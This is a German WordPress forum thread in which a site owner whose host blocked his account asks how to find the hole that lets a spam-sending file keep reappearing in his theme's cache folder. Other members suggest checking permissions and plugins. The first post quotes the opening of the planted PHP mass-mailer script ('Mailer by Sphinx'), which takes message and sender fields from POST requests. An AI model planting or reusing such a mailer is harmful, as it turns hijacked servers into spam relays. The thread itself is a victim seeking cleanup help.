Spamversand - Blog gehackt? Trojaner?

Dieses Thema im Forum "Allgemeines" wurde erstellt von Worderei, 20. März 2012.

  1. Worderei

    Worderei Well-Known Member

    Registriert seit:
    18. Oktober 2011
    Beiträge:
    58
    Zustimmungen:
    0
    Hallo,

    im Cache-Verzeichnis meines Themes befindet sich erneut eine Datei, welche massenhaft Spam an kolumbianische Adressen verschickt. Der Hoster hat mein Paket gesperrt. Erst vor einer Woche hatte ich dies. Damals löschte ich die Datei sowie einen Trojaner und updatete mein Wordpress. Nun sind aber Wordpress und alle Plugins aktuell. Wie finde ich die offenbar immer noch vorhandene Sicherheitslücke?

    Die schadhafte Datei sieht wie folgt aus:

    <?php
    @set_time_limit(0);
    if(isset($_POST['Enoc']))
    {
    $message = $_POST['html'];
    $subject = $_POST['assunto'];
    $de = $_POST['de'];
    $nombre = $_POST['RealName'];
    $ellos = $_POST['ellos'];

    $message = urlencode($message);
    $message = ereg_replace("%5C%22", "%22", $message);
    $message = urldecode($message);
    $message = stripslashes($message);

    }else{
    $testa ="";
    $message = "<html><body><h1>hola my friend, How are u ?</h1></body></html>";
    $subject = $_SERVER["HTTP_HOST"];
    $nombre = "Moe Greene";
    $de = "is_a_t@unenvio.com";
    $ellos = "mail@hotmail.com";
    }
    ?>
    <html>
    <head>
    <title> Mailer by Sphinx</title></head>
     
  2. genesis-zero

    genesis-zero Well-Known Member

    Registriert seit:
    14. Juni 2008
    Beiträge:
    186
    Zustimmungen:
    0
    1. Prüfe alle Verzeichnisse auf korrekte Rechte.
    2. Prüfe ob eines deiner Plugins oder WP selbst korrumpiert wurde.
     
  3. Worderei

    Worderei Well-Known Member

    Registriert seit:
    18. Oktober 2011
    Beiträge:
    58
    Zustimmungen:
    0
    Danke für die Zielvorgaben. Nur welche Tools sind dafür geeignet?

    Rechteprüfung:
    Gibt es irgendwo eine Übersicht, wie die Rechte gesetzt sein müssen?

    Dateiprüfung:
    Leider ist das Webverzeichnis gesperrt, sodass ich keine externen Tools nutzen kann. Was nutzt man dann?
     
  4. genesis-zero

    genesis-zero Well-Known Member

    Registriert seit:
    14. Juni 2008
    Beiträge:
    186
    Zustimmungen:
    0
    Gibt ein Plugin namens: WP-Security oder so ähnlich, dass die Rechte der wichtigen Verzeichnisse prüft. Dann musst du nur noch mit einem FTP-Programm die Rechte einstellen.

    Solltest du nun überhaupt keinen Zugriff auf deine Dateien haben, nutzt du vermutlich einen Gratishoster. Mein Tipp: Such dir einen neuen wo du für eine Leistung Geld bezahlen musst ;)
     
  5. Worderei

    Worderei Well-Known Member

    Registriert seit:
    18. Oktober 2011
    Beiträge:
    58
    Zustimmungen:
    0
    Nein, ich bin bei Hosteurope und bezahle gut dafür. :)

    Zugriff auf meine Dateien habe ich per VPN-Tunnel weiterhin. Nur externe Tools, wie Google Webmaster gehen nicht, wollte nur vorbeugen, dass solche Vorschläge kommen.